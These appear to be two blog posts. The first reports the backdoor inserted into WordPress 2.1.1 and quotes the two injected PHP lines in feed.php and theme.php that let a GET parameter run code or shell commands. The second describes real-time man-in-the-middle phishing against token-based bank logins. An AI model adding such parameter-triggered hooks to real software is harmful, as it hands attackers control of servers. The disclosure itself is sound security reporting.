Someone cracked the WordPress servers and inserted malicious code into 2 of the source files for the popular open source blog software.

If you are running WordPress v2.1.1 you need to upgrade now! Read their announcement here. This is more serious than your normal round of ‘someone found another way to exploit sloppy PHP code’ — someone was able to gain access to their download server, insert code and recreate the distribution file.

They have never had any kind of file integrity checking (GPG signatures are commonly used in Open Source projects), but I think it is high time they implemented them.

They are a bit light on details of the inserted code. It exists in 2 files – feed.php and theme.php, someone inserted this line into feed.php:
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }

And in theme.php:
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }

What this means is that someone passing the argument ix to feed.php or iz to theme.php could execute PHP code or shell commands on the server with permissions of the running web server. It is as if you opened up a guest account on your system for anyone to use. It could be used to launch spam relays, potentially exploit other security holes to gain root access, or trash your blog.

The WordPress team needs to take a very serious look at their development process and security procedures. At the least they need to designate someone as the release manager and have them GPG sign the release files so that those of us downloading their software have some level of confidence that it hasn’t been compromised.

Sounds like some kind of weird casting technique, doesn’t it? Actually it is, in the realm of scammers trying to access your bank accounts. Phishing involves the scammer sending the target an email that looks like it came from your bank. It links to a fake copy of the bank’s website and records the details that people enter. Ususally it will display an error and forward the user to the real site.

Now, according to this report, they are getting more sophisticated. Some banks are now requiring 2-factor authentication; instead of only a username and password you also need a secure token that changes every minute. Many use the RSA SecureID system to generate the tokens every 60 seconds. Instead of storing the target’s information for later use the scammer now has only 1 minute to use the information to access the account. So they make a connection to the bank and report success or failure to the user in realtime. This is commonly called a Man in the Middle attack, where the target is actually communicating with his bank, but there is someone in the middle listening in, or passing the messages in each direction.

Be paranoid, its a nasty world out there.